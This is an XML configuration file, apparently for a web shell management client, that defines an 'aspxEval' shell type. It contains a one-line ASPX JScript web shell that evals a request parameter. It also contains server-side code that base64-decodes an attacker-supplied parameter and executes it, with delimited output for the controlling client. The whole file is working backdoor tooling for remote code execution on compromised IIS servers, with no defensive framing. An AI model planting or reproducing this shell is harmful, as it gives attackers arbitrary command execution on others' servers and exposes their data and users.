<?xml version="1.0" encoding="utf-8"?>
<customShellType>
  <basicSetting>
    <name>aspxEval</name>
    <serviceExample><![CDATA[<%@ Page Language="Jscript"%><%eval(Request.Item["a"],"unsafe");%>]]></serviceExample>
    <mainCodeParam location="Body" encrymode="None" >passwd</mainCodeParam>
  </basicSetting>
  <mainCodeSetting>
	<funcCodeParam location="Body" encrymode="Base64" >funcCode</funcCodeParam>
    <item><![CDATA[Response.Write("->|");
var err;
try
{
	var item=Request.Item["$funcCode$"];
	eval(System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(item)),"unsafe");
}
catch(err)
{
	Response.Write("ERROR://"+err.message);
}
Response.Write("|<-");
Response.End();]]></item>
  </mainCodeSetting>
</customShellType>